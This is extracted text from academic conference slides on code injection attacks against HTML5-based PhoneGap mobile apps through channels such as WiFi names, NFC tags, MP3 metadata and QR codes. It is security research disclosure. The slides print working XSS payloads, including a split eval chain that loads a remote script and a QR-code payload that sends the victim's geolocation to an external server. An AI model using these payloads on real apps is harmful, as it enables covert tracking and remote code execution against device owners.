Code Injection Attacks on HTML5

advertisement
Xing Jin, Tongbo Luo, Derek G. Tsui,
Wenliang Du
Department of Electrical Engineering & Computer Science
Syracuse University
.
(a)
(e)
(b)
(c)
(d)
(f)
(g)
(h)
Outline
 BackGround



Overview of HTML5-based Mobile App
Overview of PhoneGap Architecture
Risks in JavaScript
 Code Injection Attacks on HTML5-based mobile apps




Overview of the Attack
Channels of the Attack
Examples (WIFI, NFC, MP3)
Length limitation
 Real Vulnerable Cases
 Future Work
Overview of HTML5-based Mobile App
WebView
PhoneGap
addJavascriptInterface()
HTML
CSS
JavaScript
X
X
Device
•Accelerometer
•Camera
•Compass
•Contacts
•File
•Geolocation
•Notification
…
Advantage:
Can be easily
ported between
different platforms
Overview of PhoneGap Architecture
Risks in JavaScript
 Data and code can be mixed together.
var text="Hello!<script>alert('hello')</script>";
document.write(text);
 Once it runs, the data will be displayed, and the JavaScript code will also
be executed.
Overview of the Attack
Overview of the Attack
2
3
1
Channels of XDS Attack
 ID Channels (WiFi, Bluetooth)
 Data Channels Unique to Mobile Devices (NFC, Barcode, SMS)
 Metadata Channels (MP3, MP4, Image)
Example 1(WiFi)
Non PhoneGap WiFi-Finder
PhoneGap WiFi-Finder
Example 2(NFC)
Non PhoneGap NFC App
PhoneGap NFC App
Example 3(mp3)
http://www.cis.syr.edu/~wedu/attack
Non PhoneGap Mp3 App
PhoneGap Mp3 App
Length Limitation of Channels
Overcome the limitation
•
Use External JS files:
<script src=//mu.gl></script> ( will be filter out by innerHTML)
• Split JS code into pieces:
<img src onerror=$.getScript('http://mu.gl')> (need to use jQuery)
1 <img src onerror=a="$.getScr">
2 <img src onerror=b="ipt('ht">
3 <img src onerror=c="tp://mu.">
4 <img src onerror=d="gl')">
5 <img src onerror=eval(a+b+c+d)>
Real vulnerable cases
 Downloaded 764 PhoneGap apps from Google Play
 Find several vulnerable apps satisfy two attack conditions:
• read external data from the channels that we have identified
• use vulnerable APIs or attributes to display information from the channels
Real Vulnerable Cases
Non PhoneGap App
PhoneGap App
Information sent to Sever
Real vulnerable Cases
The code injected in the QR code
<img src=x onerror=
navigator.geolocation.watchPosition(
function(loc){
m='Latitude:'+loc.coords.latitude+
'\n'+'Longitude:'+loc.coords.longitude;
alert(m);
b=document.createElement('img');
b.src='http://128.230.213.66:5556?c='+m })>
Future Work
 Large Scale analysis of HTML5-based mobile apps
 Solution to address the attack
Thanks!
Q&A
Download